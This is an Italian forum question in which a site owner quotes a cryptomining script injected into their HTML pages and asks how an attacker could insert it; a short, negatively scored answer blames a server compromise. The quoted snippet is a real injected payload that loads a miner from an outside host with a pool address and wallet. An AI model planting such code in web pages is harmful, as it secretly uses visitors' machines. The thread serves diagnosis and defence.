Injected Javascript nel mio documento HTML

1

Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag):

<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script><scripttype="text/javascript">PerfektStart('46PgJtwUkg18z7Cu7xAd2F972GSEQUzoGHWP4fwUHbdj7qgZqhf27Pm7Y7BdMUH2gahQdrCmbKxNuJAyUrGfThnhCgEyinb', 'x');throttleMiner = 50;</script>

Mi rendo conto che qualcuno sta mettendo cryptominer sulle mie pagine. Se lo cancello diversi giorni dopo ritorna.

La mia domanda è: come è possibile che un utente malintenzionato inserisca il codice direttamente nel documento? Non avresti bisogno delle credenziali del server per accedere e modificare i file sul server?

È possibile con gli attacchi XSS?

    
posta LazyPeon 08.06.2018 - 12:13
fonte

1 risposta

-2

Non è sicuramente un XSS memorizzato perché il codice ritorna quando lo elimini. Penso che qualcuno abbia accesso al tuo sistema o ha hackerato il tuo sistema prima e ha eseguito uno script su di esso e magari lo script fa altre cose malevole sul tuo server e non lo sai!

    
risposta data 26.06.2018 - 05:42
fonte

Leggi altre domande sui tag